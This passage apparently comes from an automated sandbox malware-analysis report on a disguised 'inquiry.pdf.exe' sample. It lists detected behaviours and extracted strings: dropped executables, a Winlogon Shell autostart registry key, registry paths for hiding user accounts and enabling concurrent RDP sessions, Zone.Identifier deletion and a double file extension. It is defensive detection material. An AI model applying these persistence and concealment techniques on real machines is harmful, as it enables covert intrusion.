Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/My/Resources/cZsjfbJLI2Nt8If5QOa3YzSXxDXbcmzUTY.cs High entropy of concatenated method names: '7tuLHfXnvgcErulp', 'vFPZGqKub8S44KK9njyrAe1CN2qDJ3IQa7tiGW3Oebu', 'p0Rr9tY6YlifmwQtRmfPXGEDX', 'IPf8zIYNrroPiylxpRDezmMidW58Fr8mLO'
Source: 23.0.jhFFFffkl.exe.700000.0.unpack, Astronotplart/rtGPmvPIdl5IaacYtOxDvUDj4cyvAKDSBQSIKnjuJ.cs High entropy of concatenated method names: '.ctor', 'lXIhNy5k2zuUtWijXRf3Smh', 'K04wNKQqGraj7cH31jV3', 'XjtDF35KWLF6l1is3R1Q6HxEJwEr3PbjtGbh2HVd2', 'lvOSFdRQCCluXgGa7jGQkU1jNoXRaK5EpfPYnW', 'gZQk7h6spRLFg3NwAmoe'
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\glonkjhg.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File created: C:\Users\user\AppData\Local\Temp\jhFFFffkl.exe Jump to dropped file

Boot Survival
barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\reg.exe Key value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Contains functionality to hide user accounts
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: inquiry.pdf.exe, 00000000.00000002.328710772.0000000003B49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: inquiry.pdf.exe, 00000000.00000002.329246325.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: glonkjhg.exe, 00000012.00000002.534025112.0000000003C58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: glonkjhg.exe, 00000012.00000002.534887876.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000013.00000000.403984932.0000000000919000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.485883886.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.485580240.0000000000E94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: AddInProcess32.exe, 00000014.00000003.486195668.0000000000E98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilege%SystemRoot%\System32\termsrv.dllSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDll127.0.0.1SYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType]+@
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\inquiry.pdf.exe File opened: C:\Users\user\Desktop\inquiry.pdf.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Roaming\glonkjhg.exe File opened: C:\Users\user\AppData\Roaming\glonkjhg.exe\:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe:Zone.Identifier read attributes | delete Jump to behavior
Uses an obfuscated file name to hide its real file extension (double extension)
Source: Possible double extension: pdf.exe Static PE information: inquiry.pdf.exe
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\inquiry.pdf.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: <